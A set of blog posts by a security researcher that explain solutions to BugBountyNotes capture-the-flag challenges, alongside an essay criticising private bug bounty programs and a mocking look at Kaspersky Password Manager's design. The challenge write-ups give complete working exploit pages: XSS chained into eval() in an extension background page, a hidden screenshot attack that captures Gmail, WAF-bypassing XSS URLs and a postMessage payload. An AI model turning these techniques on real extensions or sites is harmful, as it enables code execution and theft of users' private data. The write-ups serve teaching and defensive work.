My latest BugBountyNotes challenge, so far the last one, is called Can you get the flag from this browser extension?. Unlike the previous one, this isn’t about exploiting logical errors but rather about straightforward remote code execution. The goal is to run your code in the context of the extension’s background page in order to extract the flag variable stored there.

If you haven’t looked at this challenge yet, feel free to stop reading at this point and go try it out. Mind you, this one is hard and only two people managed to solve it so far. Note also that I will no longer look at any submitted answers. Of course, you can still participate in any of the ongoing challenges.

Still here? Ok, I’m going to explain this challenge then.

The obvious vulnerability

This browser extension is a minimalist password manager: it doesn’t bother storing passwords, only login names. And the vulnerability is of a very common type: when generating HTML code, this extension forgets to escape HTML special characters in the logins:

      for (let login of logins)
        html += `<li><a href="#" data-value="${login}">${login}</a></li>`;
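
For reference, the fix would only take a small helper escaping these characters before they are inserted into HTML. A minimal sketch (escapeHTML is my name for the helper, not something from the extension):

function escapeHTML(str)
{
  // Replace & first, otherwise already-escaped characters get double-escaped
  return str.replace(/&/g, "&amp;")
            .replace(/</g, "&lt;")
            .replace(/>/g, "&gt;")
            .replace(/"/g, "&quot;");
}

for (let login of logins)
  html += `<li><a href="#" data-value="${escapeHTML(login)}">${escapeHTML(login)}</a></li>`;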

Since the website can fill out and submit a form programmatically, it can make this extension remember whichever login it wants. Making the extension store something like login<img src=x onerror=alert(1)> will result in JavaScript code executing whenever the user opens the website in the future. Trouble is: the code executes in the context of the same website that injected it in the first place, so nothing is gained by that.

Getting into the content script

What you really want is to have your script run within the content script of the extension. And there is an interesting fact: if you call eval() in a content script, the code will be evaluated in the context of the content script rather than in the context of the website. This happens even if the extension’s content security policy forbids eval: content security policy only applies to extension pages, not to its content scripts. Why the browser vendors don’t tighten security here is beyond me.

And now comes something very non-obvious. The HTML code is being inserted using the following:

$container = $(html);
$login.parent().prepend($container);

One would think that jQuery uses innerHTML or its moral equivalent here but that’s not actually true. innerHTML won’t execute JavaScript code within <script> tags, so jQuery is being “helpful” and executing that code separately. Newer jQuery versions will add a <script> tag to the DOM temporarily but the versions before jQuery 2.1.2 will essentially call eval(). Bingo!
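
You can see this behavior for yourself. A sketch, assuming one of these older jQuery builds is loaded in a content script:

// Run inside a content script with jQuery < 2.1.2:
$("body").prepend("<script>console.log(typeof chrome.runtime)</script>");
// Logs "object": the script text was evaluated in the content script's
// scope, where the chrome.runtime API is available.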

So your payload has to be something like login<script>alert(1)</script>; this way your code will run in the context of the content script.

Getting from the content script to the background page

The content script can only communicate with the background page via messaging. And the background page only supports two commands: getLogins and addLogin. Neither will allow you to extract the flag or inject code.

But the way the background page translates message types into handlers is remarkable:

window[message.type].apply(window, message.params)

If you look closely, you are not restricted to the handler functions defined in the background page: any global JavaScript function will do! And there is one particularly useful function called eval(). So to extract the flag, your message has to look like this: {type: 'eval', params: ['console.log(FLAG)']}. There you go, you have code running in the background page that can extract the flag or do just about anything else.
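
The robust pattern would have been an explicit dispatch table that exposes only the intended handlers, keeping eval() and every other global out of reach. A minimal sketch, assuming getLogins and addLogin are the handler functions:

const handlers = new Map([
  ["getLogins", getLogins],
  ["addLogin", addLogin]
]);

chrome.runtime.onMessage.addListener((message, sender, sendResponse) =>
{
  // Only the functions explicitly listed above are reachable
  let handler = handlers.get(message.type);
  if (handler)
    handler(...message.params);
});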

The complete solution

So here is my complete solution. As usual, this is only one way of doing it.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Safe Login Storage solution</title>
    <script>
      window.addEventListener("load", event =>
      {
        window.setTimeout(() =>
        {
          let container = document.getElementById("logins-container");
          if (!container || !container.querySelector("[data-value^='boom']"))
          {
            document.getElementById("username").value = "boom<script>chrome.runtime.sendMessage({type: 'eval', params: ['console.log(FLAG)']})<\/script>";
            document.getElementById("submit").click();
            window.location.reload();
          }
        }, 2000);
      });
    </script>
  </head>
  <body>
    <form action="javascript:void(0)" hidden>
      <input id="username">
      <input id="submit" type="submit">
    </form>
  </body>
</html>


The big bug bounty platforms are structured like icebergs: the public bug bounty programs that you can see are only a tiny portion of everything that is going on there. As you earn your reputation on these platforms, they will be inviting you to private bug bounty programs. The catch: you generally aren’t allowed to discuss issues reported via private bug bounty programs. In fact, you are not even allowed to discuss the very existence of that bug bounty program.

I’ve been playing along for a while on Bugcrowd and HackerOne and submitted a number of vulnerability reports to private bug bounty programs. As a result, I became convinced that these private bug bounty programs are good for the bottom line of the bug bounty platforms, but otherwise their impact is harmful. I’ll try to explain why.

What is a bug bounty?

When you collect a bug bounty, that’s not because you work for a vendor. There is no written contract that states your rights and obligations. In its original form, a bug bounty works like this: you stumble upon a security vulnerability in a product and decide to do the right thing, so you inform the vendor. In turn, the vendor gives you the bug bounty as a token of their appreciation. It could be money, but also some swag or an entry in the Hall of Fame.

Why pay you when the vendor has no obligation to do so? Primarily to keep you doing the right thing. Some vulnerabilities could be turned into money on the black market. Some could be used to steal data or extort the vendor. Everybody prefers people to earn their compensation in a legal way. Hence bug bounties.

What the bug bounty isn’t

There are so many bug bounty programs around today that many people have made them their main source of income. While there are various reasons for that, one thing should not be forgotten: there is no law guaranteeing that you will be paid fairly. No contract means that your reward is completely dependent on the vendor. And it is hard to know in advance: sometimes the vendor will claim that they cannot reproduce the issue, or downplay its severity, or mark your report as a duplicate of a barely related one. In at least some cases there appears to be intent behind this behavior, with the vendor trying to fit the bug bounty program into a certain budget regardless of the volume of reports. So any security researcher trying to make a living from bug bounties has to calculate pessimistically, e.g. expecting that only one out of five reports will get a decent reward.

On the vendor’s side, there is a clear desire for the bug bounty program to replace penetration tests. Bugcrowd noticed this trend and is touting their bug bounty programs as the “next gen pen test.” The trouble is, bug bounty hunters are only paid for bugs where they can demonstrate impact. They have no incentive to report minor issues: not only is the effort of demonstrating the issue too high for the expected reward, such reports also reduce their rating on the bug bounty platform. They have no incentive to point out structural weaknesses, because these reports will be closed as “informational” without demonstrated impact. They often have no incentive to go for the more obscure parts of the product, which require more time to get familiar with but won’t necessarily yield critical bugs. In short, a “penetration test” performed by bug bounty hunters will be anything but thorough.

How are private bug bounties different for researchers?

If you feel that you are treated unfairly by the vendor, you have essentially two options. You can just accept it and vote with your feet: move on to another bug bounty program and learn to recognize programs that are better avoided. The vendor won’t care, as there will be plenty of others coming their way. Or you can make a fuss about it. You could try to argue and perhaps escalate to the bug bounty platform vendor, but IMHO this rarely changes anything. Or you could publicly shame the vendor for their behavior and warn others.

The latter is made impossible by the conditions of participation in private bug bounty programs. Both Bugcrowd and HackerOne disallow you from talking about your experience with the program. Bug bounty hunters are always dependent on the good will of the vendor, but with private bug bounties it is considerably worse.

But it’s not only that. Usually, security researchers want recognition for their findings. HackerOne even has a process for disclosing vulnerability reports once the issue has been fixed. Public Bugcrowd programs also usually provide for coordinated disclosure. This gives the reporters the deserved recognition and allows everybody else to learn. But guess what: with private bug bounty programs, disclosure is always forbidden.

Why would people participate in private bug bounties at all? The main reason seems to be reduced competition: finding unique issues is easier. In particular, if you join a private bug bounty program in its early days, you have a good opportunity to generate cash from low-hanging fruit.

Why do companies prefer private bug bounties?

If a bug bounty is about rewarding a random researcher who found a vulnerability in the product, how does a private bug bounty program make sense then? After all, it is like an exclusive club and unlikely to include the researcher in question. In fact, that researcher is unlikely to know about the bug bounty program, so they won’t have this incentive to do the right thing.

But the obvious answer is: the bug bounty platforms aren’t actually selling bug bounty management, they are selling penetration tests. They promise vendors to deliver high-quality reports from selected hackers instead of the usual noise that a public bug bounty program has to deal with. And that’s what many companies expect (but don’t receive) when they create a private bug bounty.

There is another explanation that seems to match many companies. These companies know perfectly well that they just aren’t ready for it yet. Sometimes they simply don’t have the necessary in-house expertise to write secure code, so even with their bug bounty program pointing out the same mistakes again and again, they will keep repeating them. Or they won’t free up developers from feature work to tackle security issues, so every year they will fix five issues that seem particularly severe but leave all the others untouched. So they go for a private bug bounty program because doing the same thing in public would be disastrous for their PR. And they hope that this bug bounty program will somehow make their product more secure. Except it doesn’t.

On HackerOne I also see another mysterious category: private bug bounty programs with zero activity. So somebody went through the trouble of setting up a bug bounty program but failed to make it attractive to researchers. Either it offers no rewards, or it expects people to buy hardware that they are unlikely to own already, or the description of the program is impossible to decipher. Just now I’ve been invited to a private bug bounty program where the company’s homepage was completely broken, and I still don’t really understand what they are doing. I suspect that these bug bounty programs are another example of a feature that somebody got a really nice bonus for but that nobody bothered putting any thought into.

Somebody told me that their company went with a private bug bounty because they work with selected researchers only. So it isn’t actually a bug bounty program but really a way to manage communication with that group. I hope that they still have some other way to engage with researchers outside that elite group, even if it doesn’t involve monetary rewards for reported vulnerabilities.

Conclusions

As a security researcher, I’ve collected plenty of bad experiences with private bug bounty programs, and I know that other people have as well. Let’s face it: the majority of private bug bounty programs shouldn’t have existed in the first place. They don’t really make the products in question more secure, and they increase frustration among security researchers. And while some people manage to benefit financially from these programs, others are bound to waste their time on them. The confidentiality clauses of these programs substantially weaken the position of the bug bounty hunters, which isn’t too strong to start with. These clauses are also an obstacle to learning on both sides; ideally, security issues should always be publicized once fixed.

Now the ones who should do something to improve this situation are the bug bounty platforms. However, I realize that they have little incentive to change it and are in fact actively embracing it. So while one could ask, for example, for a way to comment on private bug bounty programs so that newcomers can learn from the experiences others have had with them, such control mechanisms are unlikely to materialize. Publishing anonymized reports from private bug bounty programs would also be nice, and just as unlikely. I wonder whether the solution is to add such features via a browser extension and whether it would gain sufficient traction.

But really, private bug bounty programs are usually a bad idea. Most companies doing that right now should either switch to a public bug bounty or just drop their bug bounty program altogether. Katie Moussouris is already very busy convincing companies to drop bug bounty programs they cannot make use of; please help her and join that effort.


The time has come to reveal the answer to my next BugBountyNotes challenge called Try out my Screenshotter.PRO browser extension. This challenge is a browser extension supposedly written by a naive developer for the purpose of taking webpage screenshots. While the extension is functional, the developer discovered that some websites are able to take a peek into their Gmail account. How does that work?

If you haven’t looked at this challenge yet, feel free to stop reading at this point and go try it out. Mind you, this one is hard and only two people managed to solve it so far. Note also that I will no longer look at any submitted answers. Of course, you can still participate in any of the ongoing challenges.

Still here? Ok, I’m going to explain this challenge then.

Taking control of the extension UI

This challenge has been inspired by the vulnerabilities I discovered around the Firefox Screenshots feature. Firefox Screenshots is essentially a built-in browser extension in Firefox, and while it takes care to isolate its user interface in a frame protected by the same-origin policy, I discovered a race condition that allowed websites to change that frame into something they can access.

This race condition could not be reproduced in the challenge because the approach used works in Firefox only. So the challenge uses a different approach to protect its frame from unwanted access: it creates a frame pointing to https://example.com/ (the website cannot access it due to same-origin policy), then injects its user interface into this frame via a separate content script. And since a content script can only be injected into all frames of a tab, the content script uses the (random) frame name to distinguish the “correct” frame.

And here lies the issue, of course. While the webpage cannot predict what the frame name will be, it can see the frame being injected and change its src attribute to something else. If it loads a page from its own server into the frame, it will be able to access the injected extension UI. A submission I received for this challenge solved this even more elegantly: by assigning window.name = frame.name it made sure that the extension UI was injected directly into the attacking webpage!
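
Here is a sketch of that trick; it assumes the extension has already been made to inject its frame (triggering that is covered below) and that the UI content script hasn’t run yet:

// Adopt the frame's random name: when the extension's UI content script
// looks for a frame with that name, the attacker's own window matches.
let frame = document.getElementsByTagName("iframe")[0];
window.name = frame.name;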

Now the only issue is bringing up the extension UI. With Firefox Screenshots I had to rely on the user clicking “Take a screenshot.” The extension in this challenge, however, allowed triggering its functionality via a hotkey. And, as so often, it failed to check event.isTrusted, so it would accept events generated by the webpage. Since the extension handles events synchronously, the following code is sufficient here:

window.dispatchEvent(new KeyboardEvent("keydown", {
  key: "S",
  ctrlKey: true,
  shiftKey: true
}));
let frame = document.getElementsByTagName("iframe")[0];
frame.src = "blank.html";

Recommendation for developers: Any content which you inject into websites should always be contained inside a frame that is part of your extension. This at least makes sure that the website cannot access the frame contents, but you still have to worry about clickjacking and spoofing attacks.

Also, if you ever attach event listeners to website content, always make sure that event.isTrusted is true, so it’s a real event rather than the website playing tricks on you.
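
In code, that check is a one-line guard (a sketch):

window.addEventListener("keydown", event =>
{
  // Synthetic events dispatched by the page have isTrusted == false
  if (!event.isTrusted)
    return;

  // ... handle the hotkey ...
});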

What to screenshot?

Once the webpage can access the extension UI, clicking the “Screenshot to clipboard” button programmatically is trivial. Again, event.isTrusted is not being checked here. But even though Firefox Screenshots only accepted trusted events, that didn’t help it much. At this point the webpage can make the button transparent and huge, so that wherever the user clicks, the button is triggered.

The webpage can create a screenshot, but what’s the deal? With Firefox Screenshots I only realized it after creating the bug report: the big issue here is that the webpage can screenshot third-party pages. Just load some page in a frame and it will be part of the screenshot, even though you normally cannot access its contents. The only trouble: really critical sites such as Gmail don’t allow being loaded in a frame these days.

Luckily, this challenge had to be compatible with Chrome. While Firefox extensions can use the tabs.captureTab method to capture a specific tab, there is nothing comparable in Chrome. The solution the hypothetical extension author went with was the tabs.captureVisibleTab method, which works in either browser. Side-effect: the visible tab isn’t necessarily the tab where the screenshotting UI lives.

So the attack starts by asking the user to click a button. When clicked, that button opens Gmail in a new tab. The original page stays in the background and initiates screenshotting. When the screenshot is done, it will contain Gmail, not the attacking website.

How to get the screenshot?

The last step is getting at the screenshot, which is being copied to the clipboard. Here, a Firefox bug makes things a lot easier for attackers. Until very recently, the only way to copy something to the clipboard was calling document.execCommand() on a text field. And Firefox doesn’t allow this action to be performed on the extension’s background page, so extensions will often resort to doing it in the context of web pages that they don’t control.

The most straightforward solution is registering a copy event listener on the page; it will be triggered when the extension attempts to copy to the clipboard. That’s how I did it with Firefox Screenshots, and one of the submitted answers uses this approach as well. But I actually forgot about it when I created my own solution for this challenge, so I used a mutation observer to see when a text field is inserted into the page and read out its value (the actual screenshot URL):

let observer = new MutationObserver(mutationList =>
{
  for (let mutation of mutationList)
  {
    if (mutation.addedNodes.length && mutation.addedNodes[0].localName == "textarea")
      document.body.innerHTML = `<p>Here is what Gmail looks like for you:</p><img src="${mutation.addedNodes[0].value}">`;
  }
});
observer.observe(document.body, {childList: true});
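
For reference, the copy listener approach would look roughly like this on the attacking page (a sketch; it assumes the extension focuses its temporary text field before calling document.execCommand("copy")):

document.addEventListener("copy", event =>
{
  // The extension's copy runs while its temporary text field is focused,
  // and the copy event bubbles up to the page's document first.
  let field = document.activeElement;
  if (field && field.localName == "textarea")
    console.log("Screenshot URL:", field.value);
});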

I hope that the new Clipboard API finally makes things sane here, not merely being more elegant but also getting rid of this huge footgun. But I haven’t had a chance to play with it yet, this API being available only since Chrome 66 and Firefox 63. So the recommendation is still: make sure to run any clipboard operations in a context that you control. If the background page doesn’t work, use a tab or frame belonging to your extension.
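
Once available, the write becomes a single call that works from a context the extension controls. A sketch, with screenshotUrl standing in for whatever the extension wants to copy and the clipboardWrite permission assumed:

// No temporary text fields in foreign documents required:
navigator.clipboard.writeText(screenshotUrl)
  .then(() => console.log("Copied to clipboard"))
  .catch(error => console.error("Clipboard write failed:", error));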

The complete solution

That’s pretty much it; everything else is only about visuals and timing. The attacking website needs to hide the extension UI so that the user doesn’t suspect anything. It also has no way of knowing when Gmail finishes loading, so it has to wait for some arbitrary time. Here is what I came up with altogether. It is one way to solve this challenge but certainly not the only one.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Screenshotter.PRO browser extension (solution)</title>
    <script>
      function runAttack()
      {
        let targetWnd = window.open("https://gmail.com/", "_blank");

        window.dispatchEvent(new KeyboardEvent("keydown", {
          key: "S",
          ctrlKey: true,
          shiftKey: true
        }));

        let frame = document.getElementsByTagName("iframe")[0];
        frame.src = "blank.html";
        frame.style.visibility = "hidden";
        frame.addEventListener("load", () =>
        {
          // Leave some time for gmail.com to load
          window.setTimeout(function()
          {
            frame.contentDocument.getElementById("do_screenshot").click();

            let observer = new MutationObserver(mutationList =>
            {
              for (let mutation of mutationList)
              {
                if (mutation.addedNodes.length && mutation.addedNodes[0].localName == "textarea")
                {
                  targetWnd.close();
                  document.body.innerHTML = `<p>Here is what Gmail looks like for you:</p><img src="${mutation.addedNodes[0].value}">`;
                }
              }
            });
            observer.observe(document.body, {childList: true});
          }, 2000);
        });
      }
    </script>
  </head>
  <body>
    <button onclick="runAttack();">Click here for a surprise!</button>
  </body>
</html>


I looked at a number of password manager browser extensions already, and most of them have some obvious issues. Kaspersky Password Manager manages to stand out from the crowd, however: the approach taken here is rather unique. You know how browser extensions are rather tough to exploit, with all that sandboxed JavaScript and restrictive default content security policy? Clearly, all that is meant for weaklings who don’t know how to write secure code, not the pros working at Kaspersky.

Kaspersky developers don’t like JavaScript, so they hand over control to their beloved C++ code as soon as possible. No stupid sandboxing, the code runs with the privileges of the logged-in user. No memory safety, dealing with buffer overflows is up to the developers. How did they manage to do it? Browser extensions have an escape hatch called native messaging which allows connecting to an executable running on the user’s system. And that executable is what contains most of the logic in the case of Kaspersky Password Manager, the browser extension being merely a dumb shell.

The extension uses website events to communicate with itself. As in: code running in the same scope (content script) uses events instead of direct calls. While seemingly pointless, this approach has a crucial advantage: it allows websites to mess with the communication and essentially make calls into the password manager’s executable. Because, if this communication channel weren’t open to websites, how could the developers possibly prove that they are capable of securing their application?
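
I won’t reproduce the actual event names or message format here, but the pattern is roughly the following (a purely hypothetical sketch, all names made up):

// The page and the content script share the same DOM, so the page can
// dispatch the very events the extension uses to talk to itself:
document.dispatchEvent(new CustomEvent("kpm-command", {  // hypothetical name
  detail: JSON.stringify({command: "fillForm"})          // hypothetical payload
}));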

Now I’m pretty bad at reverse engineering binary code. But I managed to identify large chunks of custom-written code that can be triggered by websites more or less directly:

  • JSON parser
  • HTML parser
  • Neural network

While the JSON parser is required by the native messaging protocol, you are probably wondering what the other two chunks are doing in the executable. After all, the browser already has a perfectly capable HTML parser. But why rely on it? Analyzing page structure to recognize login forms would have been too easy in the browser. Instead, the browser extension serializes the page back to HTML (with some additional attributes, e.g. to point out whether a particular field is visible) and sends it to the executable. The executable parses it, makes the neural network analyze the result and tells the extension which fields need to be filled with what values.

Doesn’t sound like proper attack surface maximization because serialized HTML code will always be well-formed? No problem, the HTML parser has its limitations. For example, it doesn’t know XML processing instructions and will treat them like regular tags. And document.createProcessingInstruction("foo", "><script/src=x>") is serialized as <?foo ><script/src=x>?>, so now the HTML parser will be processing HTML code that is no longer well-formed.
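
That serialization is easy to reproduce in a browser console. A sketch, using XMLSerializer, which yields exactly the output quoted above (whatever the extension actually uses internally):

let pi = document.createProcessingInstruction("foo", "><script/src=x>");
document.body.appendChild(pi);
console.log(new XMLSerializer().serializeToString(pi));
// "<?foo ><script/src=x>?>" - a parser treating the processing instruction
// as a regular tag now sees a <script> tag that was never in the page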

This was your quick overview, hope you learned a thing or two about maximizing the attack surface. Of course, you should only do that if you are a real pro and aren’t afraid of hardening your application against attacks!


BugBountyNotes is quickly becoming a great resource for security researchers. Their challenges in particular are a fun way of learning how to exploit vulnerable code. So a month ago I decided to contribute and created two challenges: A properly secured parameter (easy) and Exploiting a static page (medium). Unlike most other challenges, these don’t really have any hidden parts; pretty much everything going on there is visible, yet exploiting the vulnerabilities still requires some thinking. So if you haven’t looked at these challenges yet, feel free to stop reading at this point and go try them out. You won’t be able to submit your answers any more, but as both challenges are about exploiting XSS vulnerabilities, you will know yourself when you have succeeded. Of course, you can also participate in any of the ongoing challenges.

Still here? Ok, I’m going to explain these challenges then.

What’s up with that parameter?

We’ll start with the easier challenge, dedicated to all the custom URL parsers that developers seem to be very fond of for some reason. The client-side code makes it very obvious that the “message” parameter is vulnerable. With the parameter value being passed to innerHTML, we would want to pass something like <img src=dummy onerror=alert("xss")> here (note that innerHTML won’t execute <script> tags).

But there is a catch of course. Supposedly, the owners of that page discovered the issue. But instead of putting resources into fixing it, they preferred a quick band-aid and configured a Web Application Firewall to stop attacks. This is the PHP code emulating the firewall:

if (preg_match('/[^\\w\\s-.,&=]/', urldecode($_SERVER['QUERY_STRING'])))
    exit("Invalid parameter value");

The allowed character set here is the bare minimum to allow the “functionality” to work, and I feel really sorry for anybody who tried to solve the challenge by attacking this “firewall.” The only way around this filter is to avoid going through it in the first place.

It might not be immediately obvious, but the URL parser used by the challenge is flawed:

      function getParam(name)
      {
        var query = location.href.split("?")[1];
        if (!query)
          return null;

        var params = query.split("&");
        for (var i = 0; i < params.length; i++)
        {
          var parts = params[i].split("=");
          if (parts[0] == name)
            return decodeURIComponent(parts[1]);
        }
        return null;
      }

Do you see the issue? Yes, it assumes that anything following the question mark is the query string. What it forgets about is the fragment part of the URL, the one following the # symbol. Any parameters in the fragment will be parsed as well. This wouldn’t normally be a big deal, but the fragment isn’t sent to the server! This means that no server-side firewall can see it, so it cannot stop attacks coming from this direction.

So here are some URLs that will trigger the XSS vulnerability here:

  • https://www.bugbountytraining.com/challenges/challenge-10.php#?message=%3Cimg%20src%3Ddumm%20onerror%3Dalert(%22xss%22)%3E
  • https://www.bugbountytraining.com/challenges/challenge-10.php?message=#%3Cimg%20src%3Ddumm%20onerror%3Dalert(%22xss%22)%3E

Of course, answers submitted by BBN users contained quite a few more variations. But what really surprised me was just how many people managed to solve this challenge without understanding how their solution worked. It seems that they attacked the Web Application Firewall blindly and just assumed that the firewall treated the # character specially for some reason.

Let’s close with some advice for all developers out there: don’t write your own URL parser. Even though URL parsing appears simple, there are many pitfalls. If you need to parse URLs, use the URL object. If you need to parse query parameters, use the URLSearchParams object. Even in non-browser environments, there are always well-tested URL parsers available.
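
With these, the challenge’s getParam() function collapses to something like this (a sketch):

function getParam(name)
{
  // searchParams only ever considers the query string - the fragment is
  // never parsed, and percent-decoding is handled correctly
  return new URL(location.href).searchParams.get(name);
}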

The long route to exploiting a message handler

The other challenge has no server side whatsoever; it’s merely a static web page. And the issue with that page should also be fairly obvious: it listens to message events. When browsers added the window.postMessage() API as a means of cross-domain communication, the idea was that any recipient would always check event.origin and reject unknown sources. But of course, many websites fail to validate the message sender at all or go for broken validation schemes. It is no different for this challenge.

Instead of validating the sender, this page validates the recipient: the recipient stated in the message has to match the page’s window name. Now the window name can be easily set by the attacker, e.g. by setting a name for the frame that this page is loaded into. The difficulty here is that the page will only consider certain recipients as “valid,” namely those where its own Buzhash variant results in 0x70617373 (or as a string: “pass”).

And that hash function is mean: no matter the input, the two bytes in the middle will always be NUL bytes! At least that’s the case as long as you constrain yourself to the ASCII character set. Once you start playing around with Unicode, the desired result actually becomes possible. A bit of experimentation gave me "\x70\x61\u6161\0\0\0\0\u7373" as a valid recipient. But because NUL bytes won’t work in the <iframe name> attribute, I had to experiment a bit more to find a somewhat less obvious solution: "\x70\x10\x10\x10\x10\u6161\u6100\u7373". Some BBN users solved this issue more elegantly: while NUL bytes in attributes don’t work, using them when setting the iframe.name property works just fine. One submission even used the Microsoft Z3 theorem prover instead of mere experimentation to find a valid recipient.

Once we managed to get the page to accept our message, what can we do then? Not a lot: we can make the page create a custom event for us. But there are no matching event listeners! That is, until you realize that jQuery’s ajaxSuccess callback is actually a regular event handler. So we can trigger that callback.

But the callback merely sets element text; it doesn’t use innerHTML or its jQuery equivalent. So not vulnerable? Indeed, setting text is unproblematic. But this code selecting the element is:

$(data.selector)

The jQuery constructor is typically called with a selector. However, it supports a large number of different calling conventions. In particular, it (like many other jQuery methods) can also be called with HTML code as the parameter. This can lead to very non-obvious security issues, as I pointed out a few years ago. Here, passing HTML code as the “selector” will allow the attacker to run JavaScript code.
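
The usual defense is to make the “this is a selector” expectation explicit, for example (a sketch):

// Unlike $(), .find() treats its argument strictly as a selector; an HTML
// string like the payload used below merely throws a syntax error:
$(document).find(data.selector)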

Here is my complete solution:

<script>
  window.onload = function()
  {
    var frame = document.getElementById("frame");
    frame.contentWindow.postMessage({
      type: "forward",
      event: "ajaxSuccess",
      selector: "<img src=x onerror=alert(document.domain)>",
      recipient: "\x70\x10\x10\x10\x10\u6161\u6100\u7373"
    }, "*");
  };
</script>
<iframe id="frame" src="https://www.bugbountytraining.com/challenges/challenge-8.html" name="&#x70;&#x10;&#x10;&#x10;&#x10;&#x6161;&#x6100;&#x7373;"></iframe>

This is only one way of demonstrating the issue of course, and some of the submissions from BBN users were more elegant than what I came up with myself.
